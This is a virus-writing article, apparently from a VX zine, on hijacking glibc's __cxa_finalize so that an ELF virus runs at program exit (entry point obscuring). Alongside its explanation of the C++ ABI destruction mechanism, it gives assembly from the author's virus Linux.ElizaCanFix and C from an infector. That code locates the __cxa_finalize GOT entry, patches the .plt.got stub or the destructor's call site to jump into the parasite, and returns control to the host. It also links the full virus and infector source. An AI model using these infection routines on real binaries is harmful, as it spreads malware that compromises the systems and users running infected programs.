Hijacking __cxa_finalize to achieve entry point obscuring

                                                      ┌───────────────────────┐
                                                      ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄       │
                                                      │ █   █ █ █ █   █       │
                                                      │ █   █ █ █ █▀▀▀▀       │
                                                      │ █   █   █ █     ▄     │
                                                      │                 ▄▄▄▄▄ │
                                                      │                 █   █ │
                                                      │                 █   █ │
                                                      │                 █▄▄▄█ │
                                                      │                 ▄   ▄ │
                                                      │                 █   █ │
                                                      │                 █   █ │
                                                      │                 █▄▄▄█ │
                                                      │                 ▄▄▄▄▄ │
Hijacking __cxa_finalize to achieve                   │                   █   │
entry point obscuring                                 │                   █   │
~ vrzh                                                └───────────────────█ ──┘

Hijacking the destruction mechanism is an effective entry point obscuring (EPO)
virus technique, so long as the delayed execution doesn't impede functionality
of the virus or the host. A common example of this technique is patching the
the destructor array. In the first tmp.out issue [0], s01den and sblip
published their Linux.Eng3ls virus, which used this EPO technique. The virus
also uses a number of other cool techniques and I strongly recommend you check
it out, as well as s01den's follow-up note on EPO techniques in tmp.out #2 [1].
The C++ ABI spec exposes another, less obvious target for hijacking code
execution - __cxa_finalize(). In this txt I'm going to describe the purpose of
__cxa_finalize(), touch on how it fits in the ELF destruction process, and
present two methods of hijacking it.

Two pieces of my code supplement this txt:
  ▪ A virus Linux.ElizaCanFix, which implements Method 0.
  ▪ An infector [2] written in C, which implements both hijacking methods.

Both programs use Silvio Cesare's text segment padding infection [3], but any
other infection method can be used. Detailing the infection method is out of
the scope of this txt.
 ╓                           ╖
═╣ What is __cxa_finalize()? ╠═════════════════════════════════════════════════
 ╙                           ╜
The purpose of __cxa_finalize() function is to run C++ object destructors. It's
defined as a part of the the Itanium C++ ABI specification [4], more precisely
the Dynamic Shared Object (DSO) destruction at runtime. According to the spec,
the DSO object destruction API consists of two components:

▪ __cxa_atexit()

┌─┤ glibc ├─────────────────────────────────────────┤ stdlib/cxa_atexit.c ├───┐
│                                                                             │
│ int __cxa_atexit (void (*func) (void *), void *arg, void *d)                │
└─────────────────────────────────────────────────────────────────────────────┘
  __cxa_atexit() registers a destructor routine func with an argument arg for a
  DSO handle d. A DSO handle is an address in one of the DSO's segments. It can
  be any address as long as it is unique per-DSO. The linker exposes this
  handle via a hidden symbol __dso_handle.

▪ __cxa_finalize()

┌─┤ glibc ├───────────────────────────────────────┤ stdlib/cxa_finalize.c ├───┐
│                                                                             │
│ void __cxa_finalize (void *d)                                               │
└─────────────────────────────────────────────────────────────────────────────┘
  __cxa_finalize() calls all destructors for the DSO represented by the handle
  d in a manner that conforms to the C++ standard (i.e. destructors are called
  in the order opposite to their registration).

Despite it appearing in a C++ specification, this mechanism is expected to be
implemented for code written in C as well, since C-only Dynamic Shared Objects
still have to interact with C++ programs in a spec-conforming manner. The spec
also notes that these functions are not be exposed to the programmer directly.
In GNU libc atexit(3) is simply a wrapper around __cxa_atexit(), although the
only argument exposed to the caller is the function pointer to the destructor.

Itanium ABI is a widely accepted specification and one is likely to find this
mechanism in dynamically linked binaries compiled with common frameworks such
as gcc and clang. GNU libc, for example, implemented it in the late 90's.
Throughout this txt I will be using glibc as the reference libc implementation.
 ╓                      ╖
═╣ Beginning of the end ╠══════════════════════════════════════════════════════
 ╙                      ╜
The return value of the main() function is passed to exit(), which in turn is
a wrapper around __run_exit_handlers():

┌─┤ glibc ├──────────────────────┤ sysdeps/generic/libc_start_call_main.h ├───┐
│                                                                             │
│   _Noreturn static __always_inline void                                     │
│   __libc_start_call_main (int (*main) (int, char **,                        │
│                                        char ** MAIN_AUXVEC_DECL),           │
│                           int argc,                                         │
│                           char **argv MAIN_AUXVEC_DECL)                     │
│   {                                                                         │
│   exit (main (argc, argv, __environ MAIN_AUXVEC_PARAM));                    │
│   }                                                                         │
├─────────────────────────────────────────────────────────┤ stdlib/exit.c ├───┤
│ void                                                                        │
│ exit (int status)                                                           │
│ {                                                                           │
│   __run_exit_handlers (status, &__exit_funcs, true, true);                  │
│ }                                                                           │
│ ...                                                                         │
│ void                                                                        │
│ attribute_hidden                                                            │
│ __run_exit_handlers (int status, struct exit_function_list **listp,         │
│              bool run_list_atexit, bool run_dtors)                          │
│ {                                                                           │
│ ...                                                                         │
│       case ef_cxa:                                                          │
│         /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),      │
│        we must mark this function as ef_free.  */                           │
│         f->flavor = ef_free;                                                │
│         cxafct = f->func.cxa.fn;                                            │
│         arg = f->func.cxa.arg;                                              │
│         PTR_DEMANGLE (cxafct);                                              │
│                                                                             │
│         /* Unlock the list while we call a foreign function.  */            │
│         __libc_lock_unlock (__exit_funcs_lock);                             │
│         cxafct (arg, status);                                               │
│         __libc_lock_lock (__exit_funcs_lock);                               │
│         break;                                                              │
│ ...                                                                         │
└─────────────────────────────────────────────────────────────────────────────┘
A function registered with __cxa_atexit() is added to the __exit_funcs list of
destructors (struct exit_function_list). In the above code excerpt you can see
that it is the same list that is passed to __run_exit_handlers() in exit().
__run_exit_handlers() will cycle through the list, executing destructors
according to their flavor. The flavor is used to distinguish how the destructor
must be executed, specifically the destructor's prototype and in some cases
additional cleanup code. Functions registered with __cxa_atexit() have the
ef_cxa flavor and in the above snippet you can see how that case is handled.

So wait... if those destructors are called in __run_exit_handlers(), when does
__cxa_finalize() get called?!

The System V ABI [5] states that at entry point the rdx register is reserved
for a function pointer to be registered with atexit by the program. In the case
of a dynamically linked executable, that function is expected to be the program
interpreter's destructor. Indeed we can see its registration in libc's init
code:

┌─┤ glibc ├────────────────────────────────────────────┤ csu/libc-start.c ├───┐
│                                                                             │
│   /* Register the destructor of the dynamic linker if there is any.  */     │
│   if (__glibc_likely (rtld_fini != NULL))                                   │
│       __cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);             │
└─────────────────────────────────────────────────────────────────────────────┘
In glibc's dynamic linker, the destructor is _dl_fini() - here it is passed to
to the loaded binary:

┌─┤ glibc ├─────────────────────────────────┤ sysdeps/x86_64/dl-machine.h ├───┐
│                                                                             │
│     # Pass our finalizer function to the user in %rdx, as per ELF ABI.\n\   │
│     leaq _dl_fini(%rip), %rdx\n\                                            │
├─────────────────────────────────────────────────────────┤ elf/dl-fini.c ├───┤
│ void                                                                        │
│ _dl_fini (void)                                                             │
│ {                                                                           │
│   /* Lots of fun ahead.  ...                                                │
└─────────────────────────────────────────────────────────────────────────────┘
To keep it short (trust me you don't want to know what a libc developer thinks
is fun) I will note that linker's destructor has many responsibilities, one of
which is to call destructors in the fini_array if that mechanism is used (which
is true for most modern ELFs). The first entry in this array is normally a
pointer to destructor code inserted by the compiler. Here are some examples of
such code:

┌─┤ gcc ├─────────────────────────────────────────────┤ libgcc/crtstuff.c ├───┐
│                                                                             │
│   static void __attribute__((used))                                         │
│   __do_global_dtors_aux (void)                                              │
│   {                                                                         │
│     ...                                                                     │
│     if (__cxa_finalize)                                                     │
│       __cxa_finalize (__dso_handle);                                        │
│                                                                             │
├─┤ llvm ├───────────────────────────────┤ compiler-rt/lib/crt/crtbegin.c ├───┤
│                                                                             │
│   static void __attribute__((used)) __do_fini(void) {                       │
│     ...                                                                     │
│                                                                             │
│     if (__cxa_finalize)                                                     │
│       __cxa_finalize (__dso_handle);                                        │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘
We have arrived! If __cxa_finalize() function is provided, it will be executed
by compiler's destructor code. It's at this point that we are most likely to
hijack this function.
 ╓                      ╖
═╣ Payload Requirements ╠══════════════════════════════════════════════════════
 ╙                      ╜
This technique mandates a common-sense payload requirement - all non-volatile
registers must be preserved. The payload will hand the execution back to the
host and if we clobber a used non-volatile register (for example the sole
argument to __cxa_finalize() in rdi) we are likely to core.
 ╓                            ╖
═╣ Method 0: Hijacking at PLT ╠════════════════════════════════════════════════
 ╙                            ╜
The primary method of hijacking __cxa_finalize() is to find and patch its PLT
stub with a jmp to the first parasite instruction. The parasite should end with
a jmp to __cxa_finalize(), referenced in GOT. To achieve this, we have to first
determine the offset of the __cxa_finalize() GOT entry, then scan the PLT for
the right stub.
   ╭                    ╮
───┤ A note on .plt.got ├──────────────────────────────────────────────────────
   ╰                    ╯
When a stub in .plt is called for the first time, the dynamic linker is invoked
to resolve the absolute address of the target function and store it in the GOT
for subsequent calls. A stub in .plt.got on the other hand, expects the GOT to
already contain the absolute address of the function. Due to this, the .plt.got
stubs are only 8 bytes long, as opposed to the 16-byte .plt stubs. Effectively,
.plt.got stubs are padded jmp instructions:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Disassembly of section .plt:                                                │
│                                                                             │
│   4090:       ff 25 9a ff 01 00       jmp    QWORD PTR [rip+0x1ff9a]        │
│   4096:       68 06 00 00 00          push   0x6                            │
│   409b:       e9 80 ff ff ff          jmp    4020                           │
│                                                                             │
│   40a0:       ff 25 92 ff 01 00       jmp    QWORD PTR [rip+0x1ff92]        │
│   40a6:       68 07 00 00 00          push   0x7                            │
│   40ab:       e9 70 ff ff ff          jmp    4020                           │
│                                                                             │
│ Disassembly of section .plt.got:                                            │
│                                                                             │
│   4640:       ff 25 52 f9 01 00       jmp    QWORD PTR [rip+0x1f952]        │
│   4646:       66 90                   xchg   ax,ax                          │
│                                                                             │
│   4648:       ff 25 62 f9 01 00       jmp    QWORD PTR [rip+0x1f962]        │
│   464e:       66 90                   xchg   ax,ax                          │
└─────────────────────────────────────────────────────────────────────────────┘
The stub for __cxa_finalize() is normally found in the .plt.got section. I
suspect this is because __cxa_finalize() doesn't benefit from the lazy linking
optimization - there isn't a case when it would be linked and not used.
   ╭                                         ╮
───┤ Finding the __cxa_finalize() GOT offset ├─────────────────────────────────
   ╰                                         ╯
The offset of the __cxa_finalize() GOT entry is found in a corresponding
relocation structure in the .rela.dyn table. To find it we must walk the host's
.rela.dyn, looking for the entry with a symbol __cxa_finalize. Again, here
we differ from a regular PLT hijack, for which we'd be walking the .rela.plt
table.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│ rela_dyn:                                                                   │
│     .loop:                                                                  │
│         mov rcx, [rsp] ; rela iterator                                      │
│         cmp rcx, QWORD [r14 + host_data.rela_dyn_size]                      │
│         jl .check_entry                                                     │
│         ; we couldn't find the rela_dyn entry                               │
│         add rsp, 8                                                          │
│         jmp fail_infect                                                     │
│                                                                             │
│     .check_entry:                                                           │
│         lea r9, [rbp + rcx] ; current .rela.dyn entry                       │
│         mov rbx, QWORD [r9 + elf64_rela.r_info]                             │
│         shr rbx, 32         ; Get the .dynsym table index                   │
│                                                                             │
│         ; calculate the .dynsym table offset                                │
│         mov rcx, rbx                                                        │
│         shl rcx, 4                                                          │
│         shl rbx, 3                                                          │
│         add rbx, rcx                                                        │
│                                                                             │
│         lea rbx, [r8 + rbx]     ; .dynsym entry                             │
│         mov ebx, DWORD [rbx + elf64_sym.st_name]                            │
│         mov rdi, [r14 + host_data.dyn_str]                                  │
│         lea rdi, [rdi + rbx]    ; symbol string offset in .dynstr           │
│         ; compare with "__cxa_finalize" string                              │
│         mov rdx, cxa_fin_str_len                                            │
│         lea rsi, [rel cxa_fin_str]                                          │
│         lea r15, [rel _memcmp]                                              │
│         call r15                                                            │
│         test rdi, rdi                                                       │
│         jnz .continue                                                       │
│         ; we found the __cxa_finalize relocation data                       │
│         mov r9, [r9 + elf64_rela.r_offset]                                  │
│         lea r9, [rax + r9]      ; __cxa_finalize GOT offset                 │
│         mov [r14 + host_data.cxa_finalize_offt], r9                         │
│         jmp .done                                                           │
└─────────────────────────────────────────────────────────────────────────────┘
The relocation type should be R_X86_64_GLOB_DAT, which simply indicates that
the r_offset field of the relocation entry points directly to the GOT entry.
   ╭                                               ╮
───┤ Finding the __cxa_finalize() stub in .plt.got ├───────────────────────────
   ╰                                               ╯
To find the correct stub, we scan the .plt.got section and check the operand of
each jmp instruction. If the operand + address after the jmp equals the GOT
entry address we found in the previous step - we've found the __cxa_finalize()
stub.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│ plt_got:                                                                    │
│     .loop:                                                                  │
│         mov ebx, DWORD [rdx + rcx + 2]  ; jmp operand                       │
│         lea r8, [rdx + rcx + 6]         ; address after the jmp             │
│         add rbx, r8                     ; test offset                       │
│         cmp rbx, QWORD [r14 + host_data.cxa_finalize_offt]                  │
│         jne .next                                                           │
│         lea rbx, [rdx + rcx]                                                │
│         mov [r14 + host_data.addrof_pltgot_stub], rbx                       │
│         jmp .done                                                           │
│                                                                             │
│     .next:                                                                  │
│         add rcx, 8 ; size of a .plt.got stub                                │
│         cmp rcx, [r14 + host_data.plt_got_len]                              │
│         jl .loop                                                            │
└─────────────────────────────────────────────────────────────────────────────┘
Now we must calculate the offset to the virus and patch this jmp instruction.
Note that in Linux.ElizaCanFix we're jumping within the same segment, so the
patch uses a near jmp. If the infection was in a different segment we would
instead need a far jmp.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│   ; patch the .plt.got stub with a jmp to parasite                          │
│   mov rbx, [r14 + host_data.addrof_pltgot_stub]                             │
│   mov BYTE [rbx], 0xe9    ; near jmp opcode                                 │
│   mov rdi, [rsp + 16]     ; end of the code segment                         │
│   lea rsi, [rbx + 5]      ; address after near jmp instruction              │
│   sub rdi, rsi            ; jmp offset to parasite                          │
│   mov DWORD [rbx + 1], edi                                                  │
└─────────────────────────────────────────────────────────────────────────────┘
Finally, we calculate the offset from the end of the infection to the
__cxa_finalize() GOT entry and add it as the jmp operand in the virus epilogue.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│   ; set up the jump after the virus                                         │
│   add rdi, rdx                ; end of the virus                            │
│   mov WORD [rdi], 0x25ff      ; jmp QWORD PTR [rip + ?]                     │
│   mov rsi, [r14 + host_data.cxa_finalize_offt]                              │
│   lea rdx, [rdi + 6]          ; address after the jmp                       │
│   sub rsi, rdx                ; new jmp offset to __cxa_finalize            │
│   mov DWORD [rdi + 2], esi                                                  │
└─────────────────────────────────────────────────────────────────────────────┘
This should be it - presuming you've found a place for your virus, the host
should now be infected.
 ╓                                             ╖
═╣ Method 1: Hijacking calls in the destructor ╠═══════════════════════════════
 ╙                                             ╜
Some Linux distributions, such as Arch (I use Arch btw), choose to build
binaries with a no-plt optimization. The rationale behind this decision is
optimizing for space - with a lot of imports the PLT can really blow up.
For those cases, Method 0 obviously won't work. I didn't want to give up on
those binaries though and came up with an alternative method. It's a bit wonky,
but gets the job done.

Recall that in both gcc and clang, the default destructor first checks whether
__cxa_finalize() is NULL before calling it. This check takes place because the
compiler doesn't know whether __cxa_finalize() will be exported by libc or
another method will be used to run the destructors. This leaves a predictable
pattern in the default destructor, which will allow us to find the hijacking
point. The strategy is to scan for a QWORD PTR cmp (48 83 3d), followed a few
instructions later by a QWORD PTR call (ff 15), both of which must have the
same operand (the other cmp operand is 0). We can then use the call operand to
calculate the GOT offset of __cxa_finalize(), patch the call to instead call
the virus body, and finally just like in the previous method, simply jmp to
the address in the __cxa_finalize() GOT entry.

First though, we need to find the default destructor. As mentioned previously,
it is normally the first entry in the fini_array so we get the .fini_array
section offset, grab the first pointer, and calculate the file offset:

┌─┤ infect_cxa_finalize.c ├───────────────────────────────────────────────────┐
│                                                                             │
│ static int get_host_sections(struct parasite_host *host)                    │
│ {                                                                           │
│     ...                                                                     │
│     Elf64_Half i;                                                           │
│     uint32_t *fini_array;                                                   │
│     ...                                                                     │
│     for (i = 0; i < host->elf->e_shnum; i++) {                              │
│         switch (host->shdrs[i].sh_type) {                                   │
│     ...                                                                     │
│         case SHT_FINI_ARRAY:                                                │
│         fini_array = (uint32_t *)((uint64_t)host->elf +                     │
│                                   (uint64_t)host->shdrs[i].sh_offset);      │
│         if (fini_array && fini_array[0]) {                                  │
│             host->do_glob_dtors = (uint8_t *)((uint64_t)host->elf +         │
│                                              (uint64_t)fini_array[0]);      │
│         }                                                                   │
│         break;                                                              │
│     ...                                                                     │
└─────────────────────────────────────────────────────────────────────────────┘
Now it's time to scan it. This method of scanning will work in a pinch, but
it's only a PoC. A stray c3 byte (ret) will cause an early loop termination.

┌─┤ infect_cxa_finalize.c ├───────────────────────────────────────────────────┐
│                                                                             │
│ #define RET 0xc3                                                            │
│ const uint8_t qwordcmp[] = { 0x48, 0x83, 0x3d };                            │
│ const uint8_t qwordcall[] = { 0xff, 0x15 };                                 │
│    ...                                                                      │
│    for (i=0; host->do_glob_dtors[i+8] != RET; i++) {                        │
│        if (!memcmp(&host->do_glob_dtors[i], qwordcmp, 3)) {                 │
│            saved_offt = *(uint32_t *)&host->do_glob_dtors[i+3];             │
│            cxafin_got = &host->do_glob_dtors[i+8] + saved_offt;             │
│            DBG("[DEBUG][CMP] __cxa_finalize\t@%p\n", cxafin_got);           │
│        }                                                                    │
│                                                                             │
│        if (!memcmp(&host->do_glob_dtors[i], qwordcall, 2)) {                │
│            saved_offt = *(uint32_t *)&host->do_glob_dtors[i+2];             │
│            if (cxafin_got == &host->do_glob_dtors[i+6] + saved_offt) {      │
│                DBG("[DEBUG] Found __cxa_finalize\t@%p\n", cxafin_got);      │
│                memcpy(&dtors_epilogue[DTORS_EPILOGUE_JMPOFFT],              │
│                       &host->do_glob_dtors[i], 6);                          │
│                host->hijack_site = &host->do_glob_dtors[i];                 │
│                return 0;                                                    │
│            }                                                                │
│        }                                                                    │
│    }                                                                        │
└─────────────────────────────────────────────────────────────────────────────┘
At this point we have all we need to finish the hijack. We patch the call site
with a call to our virus..

┌─┤ infect_cxa_finalize.c ├───────────────────────────────────────────────────┐
│                                                                             │
│ uint8_t call[6] = {                                                         │
│   0xe8, 0x00, 0x00, 0x00, 0x00, // call ?                                   │
│   0x90                          // nop                                      │
│ };                                                                          │
│                                                                             │
│ uint32_t *call_operand = (uint32_t *)&call[1];                              │
│ ...                                                                         │
│     *call_operand = virus_offt;                                             │
│     memcpy(host->hijack_site, call, 6);                                     │
│ ...                                                                         │
└─────────────────────────────────────────────────────────────────────────────┘
.. and set the address of the __cxa_finalize() GOT entry as the jmp operand in
the virus epilogue. The calculation for this jmp is exactly the same as in the
previous method.

Some of you might notice that we are replacing a far call with a near call -
operations that differ in length. The purpose of the additional nop (90)
instruction in the call[] array is to align with the surrounding destructor
code and make sure __cxa_finalize() returns to a valid instruction. Again, this
might not be necessary if your parasite lives in a different segment.

This method isn't strictly limited to hijacking __cxa_finalize() - it can be
adapted to hijack any call that can be found and reached with a predictable
code pattern.
 ╓               ╖
═╣ Disadvantages ╠═════════════════════════════════════════════════════════════
 ╙               ╜
▪ This hijacking method is only applicable to dynamically linked executables.

▪ If the binary can circumvent the destruction mechanism (e.g. through an
  exit syscall or calls to quick_exit()/_Exit()) the virus will not be reached.

▪ __cxa_finalize() might be called more than once per-execution, so if you take
  the PLT hijacking route (Method 0) your parasite may be called again.
 ╓            ╖
═╣ References ╠════════════════════════════════════════════════════════════════
 ╙            ╜
[0] Lin64.Eng3ls: Some anti-RE techniques in a Linux virus [https://tmpout.sh/1/7.html]
[1] A short note on entrypoint obscuring in ELF binaries [https://tmpout.sh/2/2.html]
[2] [https://github.com/v-rzh/cxa-finalize-infect.git]
[3] [https://web.archive.org/web/20210420163849/https://ivanlef0u.fr/repo/madchat/vxdevl/vdat/tuunix01.htm#11]
[4] Itanium C++ ABI. [https://itanium-cxx-abi.github.io/cxx-abi/]
[5] System V Application Binary Interface AMD64 Architecture Processor Supplement (29-30) [https://refspecs.linuxbase.org/elf/x86_64-abi-0.99.pdf]